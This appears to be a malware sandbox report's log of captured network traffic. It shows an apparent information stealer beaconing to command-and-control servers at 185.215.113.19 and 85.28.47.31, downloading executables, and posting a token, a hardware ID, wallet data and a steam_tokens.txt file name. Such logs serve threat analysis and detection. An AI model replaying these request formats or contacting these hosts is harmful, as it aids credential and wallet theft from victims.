Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 43 37 37 42 31 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB12C77B15F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: GET /8405906461a5200c/vcruntime140.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AKJDGIEHCAEHIEBFBKKKHost: 85.28.47.31Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 43 37 37 42 31 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB12C77B15F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IECBAFCAAKJDHJKFIEBGHost: 85.28.47.31Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 45 43 42 41 46 43 41 41 4b 4a 44 48 4a 4b 46 49 45 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 33 30 31 30 66 66 31 62 34 63 64 65 36 34 63 30 66 36 35 34 32 33 38 31 65 61 36 39 65 61 38 33 61 36 33 35 65 63 39 37 36 65 66 61 36 66 62 39 66 39 34 34 38 66 37 66 35 35 65 39 37 38 35 34 30 63 39 32 61 61 33 0d 0a 2d 2d 2d 2d 2d 2d 49 45 43 42 41 46 43 41 41 4b 4a 44 48 4a 4b 46 49 45 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 49 45 43 42 41 46 43 41 41 4b 4a 44 48 4a 4b 46 49 45 42 47 2d 2d 0d 0a Data Ascii: ------IECBAFCAAKJDHJKFIEBGContent-Disposition: form-data; name="token"a3010ff1b4cde64c0f6542381ea69ea83a635ec976efa6fb9f9448f7f55e978540c92aa3------IECBAFCAAKJDHJKFIEBGContent-Disposition: form-data; name="message"wallets------IECBAFCAAKJDHJKFIEBG--
Source: global traffic	HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----ECGHCBGCBFHIIDHIJKFBHost: 85.28.47.31Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 43 47 48 43 42 47 43 42 46 48 49 49 44 48 49 4a 4b 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 33 30 31 30 66 66 31 62 34 63 64 65 36 34 63 30 66 36 35 34 32 33 38 31 65 61 36 39 65 61 38 33 61 36 33 35 65 63 39 37 36 65 66 61 36 66 62 39 66 39 34 34 38 66 37 66 35 35 65 39 37 38 35 34 30 63 39 32 61 61 33 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 48 43 42 47 43 42 46 48 49 49 44 48 49 4a 4b 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 48 43 42 47 43 42 46 48 49 49 44 48 49 4a 4b 46 42 2d 2d 0d 0a Data Ascii: ------ECGHCBGCBFHIIDHIJKFBContent-Disposition: form-data; name="token"a3010ff1b4cde64c0f6542381ea69ea83a635ec976efa6fb9f9448f7f55e978540c92aa3------ECGHCBGCBFHIIDHIJKFBContent-Disposition: form-data; name="message"ybncbhylepme------ECGHCBGCBFHIIDHIJKFB--
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 43 37 37 42 31 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB12C77B15F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 43 37 37 42 31 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB12C77B15F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 43 37 37 42 31 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB12C77B15F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: GET /soka/random.exe HTTP/1.1Host: 185.215.113.16Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 43 37 37 42 31 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB12C77B15F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 43 37 37 42 31 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB12C77B15F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GDGIJECGDGCBKECAKFBGHost: 85.28.47.31Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 44 47 49 4a 45 43 47 44 47 43 42 4b 45 43 41 4b 46 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 33 30 31 30 66 66 31 62 34 63 64 65 36 34 63 30 66 36 35 34 32 33 38 31 65 61 36 39 65 61 38 33 61 36 33 35 65 63 39 37 36 65 66 61 36 66 62 39 66 39 34 34 38 66 37 66 35 35 65 39 37 38 35 34 30 63 39 32 61 61 33 0d 0a 2d 2d 2d 2d 2d 2d 47 44 47 49 4a 45 43 47 44 47 43 42 4b 45 43 41 4b 46 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 47 44 47 49 4a 45 43 47 44 47 43 42 4b 45 43 41 4b 46 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 47 44 47 49 4a 45 43 47 44 47 43 42 4b 45 43 41 4b 46 42 47 2d 2d 0d 0a Data Ascii: ------GDGIJECGDGCBKECAKFBGContent-Disposition: form-data; name="token"a3010ff1b4cde64c0f6542381ea69ea83a635ec976efa6fb9f9448f7f55e978540c92aa3------GDGIJECGDGCBKECAKFBGContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------GDGIJECGDGCBKECAKFBGContent-Disposition: form-data; name="file"------GDGIJECGDGCBKECAKFBG--
Source: global traffic	HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GDGIJECGDGCBKECAKFBGHost: 85.28.47.31Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 44 47 49 4a 45 43 47 44 47 43 42 4b 45 43 41 4b 46 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 33 30 31 30 66 66 31 62 34 63 64 65 36 34 63 30 66 36 35 34 32 33 38 31 65 61 36 39 65 61 38 33 61 36 33 35 65 63 39 37 36 65 66 61 36 66 62 39 66 39 34 34 38 66 37 66 35 35 65 39 37 38 35 34 30 63 39 32 61 61 33 0d 0a 2d 2d 2d 2d 2d 2d 47 44 47 49 4a 45 43 47 44 47 43 42 4b 45 43 41 4b 46 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 47 44 47 49 4a 45 43 47 44 47 43 42 4b 45 43 41 4b 46 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 47 44 47 49 4a 45 43 47 44 47 43 42 4b 45 43 41 4b 46 42 47 2d 2d 0d 0a Data Ascii: ------GDGIJECGDGCBKECAKFBGContent-Disposition: form-data; name="token"a3010ff1b4cde64c0f6542381ea69ea83a635ec976efa6fb9f9448f7f55e978540c92aa3------GDGIJECGDGCBKECAKFBGContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------GDGIJECGDGCBKECAKFBGContent-Disposition: form-data; name="file"------GDGIJECGDGCBKECAKFBG--
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 43 37 37 42 31 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB12C77B15F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IECBAFCAAKJDHJKFIEBGHost: 85.28.47.31Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 45 43 42 41 46 43 41 41 4b 4a 44 48 4a 4b 46 49 45 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 33 30 31 30 66 66 31 62 34 63 64 65 36 34 63 30 66 36 35 34 32 33 38 31 65 61 36 39 65 61 38 33 61 36 33 35 65 63 39 37 36 65 66 61 36 66 62 39 66 39 34 34 38 66 37 66 35 35 65 39 37 38 35 34 30 63 39 32 61 61 33 0d 0a 2d 2d 2d 2d 2d 2d 49 45 43 42 41 46 43 41 41 4b 4a 44 48 4a 4b 46 49 45 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 49 45 43 42 41 46 43 41 41 4b 4a 44 48 4a 4b 46 49 45 42 47 2d 2d 0d 0a Data Ascii: ------IECBAFCAAKJDHJKFIEBGContent-Disposition: form-data; name="token"a3010ff1b4cde64c0f6542381ea69ea83a635ec976efa6fb9f9448f7f55e978540c92aa3------IECBAFCAAKJDHJKFIEBGContent-Disposition: form-data; name="message"files------IECBAFCAAKJDHJKFIEBG--
Source: global traffic	HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BFIJKEBFBFHIJJKEHDHIHost: 85.28.47.31Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 46 49 4a 4b 45 42 46 42 46 48 49 4a 4a 4b 45 48 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 33 30 31 30 66 66 31 62 34 63 64 65 36 34 63 30 66 36 35 34 32 33 38 31 65 61 36 39 65 61 38 33 61 36 33 35 65 63 39 37 36 65 66 61 36 66 62 39 66 39 34 34 38 66 37 66 35 35 65 39 37 38 35 34 30 63 39 32 61 61 33 0d 0a 2d 2d 2d 2d 2d 2d 42 46 49 4a 4b 45 42 46 42 46 48 49 4a 4a 4b 45 48 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 42 46 49 4a 4b 45 42 46 42 46 48 49 4a 4a 4b 45 48 44 48 49 2d 2d 0d 0a Data Ascii: ------BFIJKEBFBFHIJJKEHDHIContent-Disposition: form-data; name="token"a3010ff1b4cde64c0f6542381ea69ea83a635ec976efa6fb9f9448f7f55e978540c92aa3------BFIJKEBFBFHIJJKEHDHIContent-Disposition: form-data; name="message"wkkjqaiaxkhb------BFIJKEBFBFHIJJKEHDHI--
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 43 37 37 42 31 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB12C77B15F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 85.28.47.31Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 43 37 37 42 31 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB12C77B15F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGHIIJDGHCBFIECBKEGHHost: 85.28.47.31Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 47 48 49 49 4a 44 47 48 43 42 46 49 45 43 42 4b 45 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 38 39 37 46 39 41 35 35 33 43 36 32 35 30 37 32 38 36 39 35 38 0d 0a 2d 2d 2d 2d 2d 2d 42 47 48 49 49 4a 44 47 48 43 42 46 49 45 43 42 4b 45 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 69 6c 61 0d 0a 2d 2d 2d 2d 2d 2d 42 47 48 49 49 4a 44 47 48 43 42 46 49 45 43 42 4b 45 47 48 2d 2d 0d 0a Data Ascii: ------BGHIIJDGHCBFIECBKEGHContent-Disposition: form-data; name="hwid"5897F9A553C62507286958------BGHIIJDGHCBFIECBKEGHContent-Disposition: form-data; name="build"sila------BGHIIJDGHCBFIECBKEGH--
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 43 37 37 42 31 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB12C77B15F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 43 37 37 42 31 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB12C77B15F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
